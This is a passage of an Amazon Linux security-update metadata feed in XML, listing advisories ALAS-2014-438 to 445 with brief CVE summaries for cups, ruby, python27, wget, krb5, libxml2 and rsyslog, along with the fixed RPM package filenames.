arch="noarch"><filename>Packages/golang-pkg-darwin-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-plan9-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-plan9-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-netbsd-arm" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-netbsd-arm-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-windows-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-windows-amd64-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="emacs-golang" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-golang-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-arm" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-arm-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-bin-linux-amd64" version="1.3.3" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-pkg-bin-linux-amd64-1.3.3-1.7.amzn1.x86_64.rpm</filename></package><package name="golang-pkg-linux-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-linux-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-freebsd-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-freebsd-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-windows-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-pkg-windows-386-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.3.3" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.3.3-1.7.amzn1.noarch.rpm</filename></package><package name="golang-pkg-bin-linux-386" version="1.3.3" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/golang-pkg-bin-linux-386-1.3.3-1.7.amzn1.i686.rpm</filename></package><package name="golang" version="1.3.3" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.3.3-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-438</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-438: medium priority package update for cups</title><issued date="2014-10-28 17:17:00" /><updated date="2014-11-01 14:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-5031:
It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system.
CVE-2014-5030:
It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system.
CVE-2014-5029:
It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system.
CVE-2014-3537:
It was discovered that CUPS allowed certain users to create symbolic links in certain directories under /var/cache/cups/. A local user with the 'lp' group privileges could use this flaw to read the contents of arbitrary files on the system or, potentially, escalate their privileges on the system.
CVE-2014-2856:
A cross-site scripting (XSS) flaw was found in the CUPS web interface. An attacker could use this flaw to perform a cross-site scripting attack against users of the CUPS web interface.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856" title="" id="CVE-2014-2856" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3537" title="" id="CVE-2014-3537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5029" title="" id="CVE-2014-5029" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5030" title="" id="CVE-2014-5030" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5031" title="" id="CVE-2014-5031" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1388.html" title="" id="RHSA-2014:1388" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cups-lpd" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-lpd-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-devel-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-libs-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-debuginfo-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.20.al12" epoch="1" arch="x86_64"><filename>Packages/cups-php-1.4.2-67.20.al12.x86_64.rpm</filename></package><package name="cups-libs" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-libs-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups-lpd" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-lpd-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups-devel" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-devel-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups-php" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-php-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-1.4.2-67.20.al12.i686.rpm</filename></package><package name="cups-debuginfo" version="1.4.2" release="67.20.al12" epoch="1" arch="i686"><filename>Packages/cups-debuginfo-1.4.2-67.20.al12.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-439</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-439: medium priority package update for ruby21</title><issued date="2014-11-05 12:13:00" /><updated date="2014-11-05 14:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8080:
The REXML parser in Ruby 1.9.x before 1.9.3-p550, 2.0.x before 2.0.0-p594, and 2.1.x before 2.1.4 allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document, aka an XML Entity Expansion (XEE) attack.
1157709:
CVE-2014-8080 ruby: REXML billion laughs attack via parameter entity expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8080" title="" id="CVE-2014-8080" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby21-devel" version="2.1.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.4-1.14.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.4-1.14.amzn1.x86_64.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.14.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.2" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.2-1.14.amzn1.x86_64.rpm</filename></package><package name="rubygems21" version="2.2.2" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.2-1.14.amzn1.noarch.rpm</filename></package><package name="rubygems21-devel" version="2.2.2" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.2-1.14.amzn1.noarch.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.14.amzn1.x86_64.rpm</filename></package><package name="ruby21-irb" version="2.1.4" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.4-1.14.amzn1.noarch.rpm</filename></package><package name="ruby21-libs" version="2.1.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.4-1.14.amzn1.x86_64.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.4-1.14.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.4" release="1.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.4-1.14.amzn1.noarch.rpm</filename></package><package name="ruby21-libs" version="2.1.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.4-1.14.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.14.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.4-1.14.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.2" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.2-1.14.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.14.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.4-1.14.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.4-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-440</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-440: medium priority package update for python27</title><issued date="2014-11-05 12:15:00" /><updated date="2014-11-11 10:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7185:
Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a "buffer" function.
1146026:
CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
CVE-2014-4650:
1113527:
CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650" title="" id="CVE-2014-4650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7185" title="" id="CVE-2014-7185" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.8" release="6.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.8-6.74.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.8-6.74.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.8" release="6.74.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.8-6.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-441</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-441: medium priority package update for ruby20</title><issued date="2014-11-05 12:16:00" /><updated date="2014-11-05 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8080:
The REXML parser in Ruby 1.9.x before 1.9.3-p550, 2.0.x before 2.0.0-p594, and 2.1.x before 2.1.4 allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document, aka an XML Entity Expansion (XEE) attack.
1157709:
CVE-2014-8080 ruby: REXML billion laughs attack via parameter entity expansion
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8080" title="" id="CVE-2014-8080" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems20" version="2.0.14" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14-1.19.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.594-1.19.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.594-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.594-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14-1.19.amzn1.noarch.rpm</filename></package><package name="ruby20-irb" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.594-1.19.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.594-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.594-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.594-1.19.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.594-1.19.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.594-1.19.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.19.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.19.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.594" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.594-1.19.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-442</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-442: medium priority package update for wget</title><issued date="2014-11-05 12:19:00" /><updated date="2014-11-05 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4877:
Absolute path traversal vulnerability in GNU Wget before 1.16, when recursion is enabled, allows remote FTP servers to write to arbitrary files, and consequently execute arbitrary code, via a LIST response that references the same filename within two entries, one of which indicates that the filename is for a symlink.
1139181:
CVE-2014-4877 wget: FTP symlink arbitrary filesystem access
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4877" title="" id="CVE-2014-4877" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wget-debuginfo" version="1.16" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-debuginfo-1.16-1.13.amzn1.x86_64.rpm</filename></package><package name="wget" version="1.16" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/wget-1.16-1.13.amzn1.x86_64.rpm</filename></package><package name="wget-debuginfo" version="1.16" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/wget-debuginfo-1.16-1.13.amzn1.i686.rpm</filename></package><package name="wget" version="1.16" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/wget-1.16-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-443</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-443: medium priority package update for krb5</title><issued date="2014-11-11 10:25:00" /><updated date="2014-11-11 10:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4345:
A buffer overflow was found in the KADM5 administration server (kadmind) when it was used with an LDAP back end for the KDC database. A remote, authenticated attacker could potentially use this flaw to execute arbitrary code on the system running kadmind.
CVE-2014-4344:
A NULL pointer dereference flaw was found in the MIT Kerberos SPNEGO acceptor for continuation tokens. A remote, unauthenticated attacker could use this flaw to crash a GSSAPI-enabled server application.
CVE-2014-4343:
A double-free flaw was found in the MIT Kerberos SPNEGO initiators. An attacker able to spoof packets to appear as though they are from an GSSAPI acceptor could use this flaw to crash a client application that uses MIT Kerberos.
CVE-2014-4342:
Two buffer over-read flaws were found in the way MIT Kerberos handled certain requests. A remote, unauthenticated attacker who is able to inject packets into a client or server application's GSSAPI session could use either of these flaws to crash the application.
CVE-2014-4341:
Two buffer over-read flaws were found in the way MIT Kerberos handled certain requests. A remote, unauthenticated attacker who is able to inject packets into a client or server application's GSSAPI session could use either of these flaws to crash the application.
CVE-2013-6800:
It was found that if a KDC served multiple realms, certain requests could cause the setup_server_realm() function to dereference a NULL pointer. A remote, unauthenticated attacker could use this flaw to crash the KDC using a specially crafted request.
CVE-2013-1418:
It was found that if a KDC served multiple realms, certain requests could cause the setup_server_realm() function to dereference a NULL pointer. A remote, unauthenticated attacker could use this flaw to crash the KDC using a specially crafted request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1418" title="" id="CVE-2013-1418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6800" title="" id="CVE-2013-6800" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4341" title="" id="CVE-2014-4341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4342" title="" id="CVE-2014-4342" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4343" title="" id="CVE-2014-4343" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4344" title="" id="CVE-2014-4344" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4345" title="" id="CVE-2014-4345" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1389.html" title="" id="RHSA-2014:1389" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-libs" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="33.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.10.3-33.28.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.10.3-33.28.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.10.3" release="33.28.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.10.3-33.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-444</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-444: medium priority package update for libxml2</title><issued date="2014-11-11 10:26:00" /><updated date="2014-11-11 10:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3660:
A denial of service flaw was found in libxml2, a library providing support to read, modify and write XML and HTML files. A remote attacker could provide a specially crafted XML file that, when processed by an application using libxml2, would lead to excessive CPU consumption (denial of service) based on excessive entity substitutions, even if entity substitution was disabled, which is the parser default behavior.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3660" title="" id="CVE-2014-3660" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1655.html" title="" id="RHSA-2014:1655" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-3.1.32.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-3.1.32.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.9.1-3.1.32.amzn1.i686.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-3.1.32.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-3.1.32.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="3.1.32.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-3.1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-445</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-445: medium priority package update for rsyslog</title><issued date="2014-11-11 10:26:00" /><updated date="2014-11-11 10:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3634:
A flaw was found in the way rsyslog handled invalid log message priority values. In certain configurations, a local attacker, or a remote attacker able to connect to the rsyslog port, could use this flaw to crash the rsyslog daemon.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3634" title="" id="CVE-2014-3634" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1671.html" title="" id="RHSA-2014:1671" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rsyslog" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-snmp-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gssapi-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-pgsql-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-mysql-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-debuginfo-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="9.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gnutls-5.8.10-9.26.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-mysql-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-debuginfo-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="9.26.amzn1" epoch="0" 